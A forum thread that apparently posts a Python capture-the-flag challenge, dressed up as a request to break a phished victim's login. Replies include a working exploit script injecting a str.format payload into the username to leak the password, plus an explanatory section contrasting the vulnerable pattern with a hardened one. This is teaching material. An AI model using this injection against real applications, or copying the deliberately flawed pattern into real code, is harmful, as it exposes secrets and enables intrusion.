Python adventures 01

Hey amigo,

A common friend said you can help me out, you’ll be rewarded for your time - handsomely - don’t worry.

We phished some buffoon to get access, but this stands in our way to leak their entire database, it’s supposed to spit out some numbers we can use as an access code. Johnny said you’ll need Python 3.6 or 3.7 to run it (I’m not good with numbers, see if it runs FFS), and then give us the code.

import random

PASSWORD = random.weibullvariate(alpha=13, beta=37)


class InvalidUsernameException(BaseException):
    def __init__(self, invalid_username: str) -> None:
        print(
            f"'{invalid_username.format(error=self)}' "
            f"is not recognised as an authorised user, "
            f"but login is permitted with the secret key."
        )


class InvalidPasswordException(BaseException):
    def __init__(self):
        print("Invalid password provided. Authorities have been informed.")


def grant_access():
    print(
        f"*** Access Granted! ***\n\n"
        f"  The Shirai Ryu are ninja, Liu Kang\n\n"
        f"The access code is: {PASSWORD / random.triangular()}"
    )


def check_password(user_password: str) -> None:
    if user_password != str(PASSWORD):
        raise InvalidPasswordException()


if __name__ == "__main__":
    username = input("Username: ")
    password = PASSWORD

    try:
        if username != "the_mighty_snail":
            raise InvalidUsernameException(username)
    except InvalidUsernameException:
        password = input("Secret: ")
    finally:
        check_password(password)
        grant_access()

Hint 1

The idiot who wrote it messed up: the hard coded account doesn’t even work, because there’s a type mismatch between the passwords, so don’t bother

Hint 2

I wonder what the fuck was this guy thinking when he implemented InvalidUsernameException. I bet he showed that code around with pride and shit

Hint 3

Ah yeah, Nicky said there’s no sanitization on the username you enter, and you might be able to run some Python bullshit there. Don’t care, just give me the code!

5 Likes

Hey @n00bi3s - is this something you’d be interested in?

1 Like

Thanks @hacker_snail! This looks very interesting! I’ll give it a shot :slight_smile:

This is what I got:

*** Access Granted! ***

The Shirai Ryu are ninja, Liu Kang

The access code is: 23.4824998086134

3 Likes

Well done (that was fast!) - the access code is random, just added it for fun. I hope you liked it <3

Awesome challenge. But I still figured out how to throw that bullshit in python3 haha

This was a fantastic challenge. Took me many days to get this through. Thanks for constant support @hacker_snail ! I learnt a lot :slight_smile: Already in love with the community :slight_smile:

Maybe I’m missing the point here.

It’s supposed to spit out some numbers we can use as an access code. […] Give us the code.

This seems too simple. I saved the provided code as challenge.py. Then I created a second piece of code called crack.py:

import challenge
challenge.grant_access()

That’s all it takes. I run crack.py:

*** Access Granted! ***

  The Shirai Ryu are ninja, Liu Kang

The access code is: 19.388974297289792

Am I missing the point here?

Thanks @hacker_snail! That was a fantastic challenge.

Exploit in python
#!/usr/bin/env python
import subprocess
import re

if __name__ == '__main__':
   regex = re.compile("'(.+)'")

   proc = subprocess.Popen(['python3.7', './adventure_01.py'], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
   proc.stdin.write(b"{error.__init__.__globals__[PASSWORD]}\n")
   proc.stdin.flush()

   line = proc.stdout.readline().decode("utf-8")
   password = regex.findall(line)[0]

   proc.stdin.write((password + "\n").encode("utf-8"))
   proc.stdin.flush()
   proc.stdin.close()

   lines = proc.stdout.readlines()
   print("".join([line.decode("utf-8") for line in lines]))

   proc.terminate()
2 Likes
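
The flaw that Hints 2 and 3 point at, shown next to a hardened form, as an added example that is not part of any post in this thread: the challenge calls `.format()` on the username, so the username acts as a template instead of a value. The names `VulnerableError`, `SafeError` and `has_format_fields`, and the value given to `PASSWORD`, are constructed for illustration.

```python
import string

PASSWORD = 13.37  # constructed stand-in for the challenge's module-level secret


class VulnerableError(Exception):
    """Same pattern as the challenge: the username is used as the template."""

    def __init__(self, username: str) -> None:
        # Flaw kept on purpose: str.format() resolves attribute and index
        # lookups in attacker-supplied fields against the object passed in.
        super().__init__(f"'{username.format(error=self)}' is not recognised")


class SafeError(Exception):
    """Hardened form: the username is only ever a value, never a template."""

    def __init__(self, username: str) -> None:
        super().__init__("{!r} is not recognised".format(username))


def has_format_fields(text: str) -> bool:
    """True if untrusted text contains str.format replacement fields."""
    try:
        parsed = string.Formatter().parse(text)
        return any(field is not None for _, field, _, _ in parsed)
    except ValueError:
        return True  # unbalanced braces: not plain text, treat as suspect


if __name__ == "__main__":
    # The first string is the input used in the exploit post above.
    for name in ("{error.__init__.__globals__[PASSWORD]}", "the_mighty_snail"):
        print("template-like input:", has_format_fields(name))
        print("  vulnerable:", VulnerableError(name))
        print("  hardened:  ", SafeError(name))
```

The fix is structural rather than a filter: the template stays a constant the program owns, and `has_format_fields` is only useful for logging or alerting on suspicious input.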